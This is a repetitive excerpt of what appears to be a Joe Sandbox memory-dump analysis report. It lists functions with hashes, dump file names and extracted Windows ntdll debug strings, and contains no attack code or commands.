                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3090000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                    • API String ID: 0-3558027158
                                                                                                                                    • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                                                                                    • Instruction ID: 64d7ffc4fadf4c3a3c51e27acb09b69973297c70f69852c106be3d0ae7110d35
                                                                                                                                    • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                                                                                    • Instruction Fuzzy Hash: 419150F04482948ACB158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89059B85
                                                                                                                                    Function 031C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                                                                                                    • Instruction ID: 5086db05a577ed83efaffe831368c66586d203ac9aaa0b9e76bfe593f7beec74
                                                                                                                                    • Opcode Fuzzy Hash: 4e454c3c3e704914b3c95de469052631f5c5cdf6a70f2e94bbb3aa0cf770042e
                                                                                                                                    • Instruction Fuzzy Hash: A251E6B6A10256BFCF14DB98889097EF7B8BF1D200B18856DE4A9D7641D374EE418BE0
                                                                                                                                    Function 031B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 031F4742
                                                                                                                                    • Execute=1, xrefs: 031F4713
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 031F4725
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 031F4655
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 031F4787
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031F46FC
                                                                                                                                    • ExecuteOptions, xrefs: 031F46A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                                                                                                    • Instruction ID: 65ed34f64a19d10fad05985dffeb5acb79c488d46ce0b5fb48049b9cc25c59cf
                                                                                                                                    • Opcode Fuzzy Hash: 717f892882a3a917457e9ae2e21a62a981c676ecab13d0b9972da59e13cccfdd
                                                                                                                                    • Instruction Fuzzy Hash: 1E51F735A003197FEF25EAA5EC99FEE77B8AF4C700F0400A9D505AB1D1EB719A858F50
                                                                                                                                    Function 031CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: eb3f8b07ccb4863cc385fc1e1eb0cfe4acd04b0e7bfb4cc610a0e4ee9f88a5bf
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: 35819F70E292D99BDF28CEA8C8527AEBBB5AF69310F1CC15DD851E73D1C73498808B51
                                                                                                                                    Function 031AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F031E
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031F02BD
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031F02E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                                                                                                    • Instruction ID: e6641b33bd441a563b88d6d4f3593db94f148261a9c504fe5cb7d6b88d027487
                                                                                                                                    • Opcode Fuzzy Hash: e1c5e55a1a96361048841ba798834a332ad038059b03f060ad8bf3db22e3f9ca
                                                                                                                                    • Instruction Fuzzy Hash: 8DE1D078608B419FD725CF28C884B2AB7E0BF8C315F184A5DF5A58B2E1D774D886CB52
                                                                                                                                    Function 031BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 031F7B7F
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F7BAC
                                                                                                                                    • RTL: Resource at %p, xrefs: 031F7B8E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                                                                                                    • Instruction ID: f60cd72098900620f899434db0ba763d629e578ac2f32d8581bd048acabf8375
                                                                                                                                    • Opcode Fuzzy Hash: 71446cad3db5ca56521bfa31cdbc40a80505588d8b578ce1f753914e013d3b9d
                                                                                                                                    • Instruction Fuzzy Hash: BE4102353087029FD724DE25C840BAAB7E5EF8D710F044A1DF99ADBA80DB71E445CB91
                                                                                                                                    Function 031BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031F728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 031F7294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 031F72C1
                                                                                                                                    • RTL: Resource at %p, xrefs: 031F72A3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                                                                                                    • Instruction ID: aaa68e9a47590b78ae3ebaed57abe45c669eb152d4d931dc93385b32ac9036bd
                                                                                                                                    • Opcode Fuzzy Hash: b8487de6e767305af88ba3bf0bf17e543ea274552b8fc84dc3678e7c419c57bf
                                                                                                                                    • Instruction Fuzzy Hash: 62411F35608202AFC720DE25CC41FAAB7A5FB8C750F144A18F956AB680DB30E896CBD1
                                                                                                                                    Function 031C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 22294aa9655ff7fd1ce6aac20b28749acac325c7802ec4085907fbbd74b3a9e4
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: CD91C371E202899FDB24DE69C8D06BEB7A5AF6C720F18451EE875E72C0D7B08991CF50
                                                                                                                                    Function 03189126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
                                                                                                                                    • Instruction ID: 4fccbf0c6dcd5618e331fe8a5681c799a08a815a6e8504547ad4766c38a3b21e
                                                                                                                                    • Opcode Fuzzy Hash: e076330367d181eb2e87721d914c4b442e8f96602684b04610c58fd192afcd69
                                                                                                                                    • Instruction Fuzzy Hash: 77814975D006699BDB25EB54CC44BEEB7B8AF0C710F0445EAE919B7280E7309E85CFA4